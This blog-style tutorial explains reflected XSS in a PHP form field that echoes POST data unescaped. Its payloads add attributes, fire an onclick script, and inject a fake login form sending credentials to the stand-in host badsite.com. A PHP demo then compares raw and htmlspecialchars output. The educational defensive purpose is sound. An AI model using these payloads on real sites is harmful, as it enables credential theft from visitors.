I was recently taking a small quiz in PHP as part of a job interview (by the way if anyone knows of a job opening for a telecommuting contractor, please let me know). One of the questions posed contained this piece of code which has been slightly modified for our use.
<input type="text" name="order" value="<?php echo $_POST['order']; ?>" />
Basically the question was: What is wrong with this code? I didn’t really think much of it, because it is a classic example of an XSS vulnerability. After submitting the quiz, I was given a phone interview in which I learned that no one else was able to pick out the XSS vulnerability. To be fair to the others interviewed, I do not know what their qualifications were or how much experience they have had with PHP.
Anyway, if you want to write code for the internet you need to be able to pick out these simple vulnerabilities and understand how they are exploited. It does not matter if you are just coding for your own website or getting paid: security holes affect not only the website but, more importantly, your visitors.
OK, so how is this code exploited? I assume the coders who do not see the vulnerability think that even if the value contains HTML, JavaScript, or anything else, it will simply be printed into the text box. For example, if the value provided is:
<em>hello</em>
When the form is submitted the code will simply print:
<em>hello</em>
in the text box.
This is true, but the problem is: what happens when someone enters:
watch it grow" size="100
When this value is printed in the text box, the browser 'sees' the quote following "watch it grow" and ends the 'value' attribute. The browser then adds a 'size' attribute to the input tag, whose value is 100. Basically, the code interpreted by the browser looks like this:
<input type="text" name="order" value="watch it grow" size="100" />
Now we know that simply adding a " (quote) will end the value attribute, and any number of additional attributes can be added by the user. So let's make a more interactive value and add some JavaScript. In the text box we can enter:
click here" onclick="alert('hello');
Now the code interpreted by the browser looks like this:
<input type="text" name="order" value="click here" onclick="alert('hello');" />
After the form is submitted the value in the text box reads: click here. When the user then clicks the text box the JavaScript will fire and an alert will appear which reads: ‘hello’.
Taking this exploit one step further, here is one final example. The attack is not limited to simply adding attributes to the input tag (although in most cases this is all someone needs to do to accomplish their task). If we wanted to also add extra HTML, or a full-blown script, all that needs to be done is to end the 'value' attribute with the " (quote) and then add the end of the input tag: /> and presto, we are out of the input tag and free to add anything, such as a new form which POSTs to a different website. Let's add:
Fill out form completely" disabled/></form><form method="POST" action="http://badsite.com">Username: <input type="text" name="username"><br/>Password:<input type="password" name="user_pass"><br/><input type="hidden" name="end_input" value="
With this code we start with: Fill out form completely"
The " (quote) following the word 'completely' will end the 'value' attribute.
We then place: disabled/>
This will disable the "order" input and end the tag; now we are in the realm of adding HTML.
Next by adding: </form>
We have ended the form, and are able to create something new.
As you can see we have added our own form which submits the user’s values to a different website: badsite.com. This code in essence takes control of the original submit button, because by adding the new form the submit button submits all values wherever we like.
To get a clear picture, after the form is submitted this is the code which is rendered by the browser (formatted for readability):
<input type="text" name="order" value="Fill out form completely" disabled/> </form> <form method="POST" action="http://badsite.com"> Username: <input type="text" name="username"/> <br /> Password: <input type="password" name="user_pass"/> <br /> <input type="hidden" name="end_input" value=""/>
Hopefully you now see that this is an extremely powerful exploit which needs to be addressed. Wait, I know what you're thinking: with this type of exploit the only user affected is the one submitting the form in the first place. This is simply NOT true, but you will have to do the research yourself if you still don't believe that this is a security hole (or you have ideas of cracking a few sites).
So how can we possibly stop this type of attack? Actually, it is really simple: PHP provides a built-in function, htmlspecialchars().
htmlspecialchars() converts special characters to HTML entities, rendering all of our examples useless. So our original piece of code would look like this:
<input type="text" name="order" value="<?php echo htmlspecialchars($_POST['order']); ?>" />
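The following is an added example (not code from the original post): it renders the "order" field both the vulnerable way and the escaped way for the three payloads walked through above, then parses each result with DOMDocument to count the elements, forms and on* handlers a browser would actually see. The function names and the use of ENT_QUOTES with a UTF-8 charset are my assumptions, not something the post specifies.

```php
<?php
// Added example: compare the vulnerable rendering with the escaped one
// and inspect what the browser's parser makes of each fragment.

function render_unsafe(string $value): string {
    return '<input type="text" name="order" value="' . $value . '" />';
}

function render_safe(string $value): string {
    // ENT_QUOTES also escapes single quotes, so the output is safe in either
    // attribute quoting style; UTF-8 is the assumed page charset.
    $escaped = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="order" value="' . $escaped . '" />';
}

// Count elements, forms and on* event-handler attributes in a fragment,
// i.e. what the browser would end up with after parsing the markup.
function inspect(string $fragment): array {
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);     // tolerate broken markup
    $doc->loadHTML('<form>' . $fragment . '</form>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $stats = ['elements' => 0, 'forms' => 0, 'handlers' => 0];
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (in_array($el->tagName, ['html', 'head', 'body'], true)) continue;
        $stats['elements']++;
        if ($el->tagName === 'form') $stats['forms']++;
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) $stats['handlers']++;
        }
    }
    return $stats;
}

// The three constructed payloads from the post.
$payloads = [
    'watch it grow" size="100',
    'click here" onclick="alert(\'hello\');',
    'Fill out form completely" disabled/></form><form method="POST" action="http://badsite.com">Username: <input type="text" name="username"><br/>Password:<input type="password" name="user_pass"><br/><input type="hidden" name="end_input" value="',
];

foreach ($payloads as $p) {
    echo "unsafe: ", json_encode(inspect(render_unsafe($p))), "\n";
    echo "safe:   ", json_encode(inspect(render_safe($p))), "\n";
    echo "        ", render_safe($p), "\n\n";
}
```

The escaped rendering always parses to a single form with a single input and no handlers; the quote in each payload is emitted as &quot; and never closes the attribute.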
This is only one way to ‘fix’ the problem and may not work in all situations; some other methods of preventing an XSS attack are:
- Use an exclusion approach with strip_tags().
- Use regular expressions to filter any data which may not have been caught by the built-in functions.
- Use filtration methods on all external data including: database and $_SERVER data. Basically any data which does not originate from inside the script.
I believe the best defense is a combination of a few different strategies.
XSS is a huge topic and this only scratches the surface. If you want to find more information, use your favorite search engine and search the phrase: "PHP XSS exploits tutorials". Then read until you're so paranoid that you want to take down your website immediately and fix all the holes.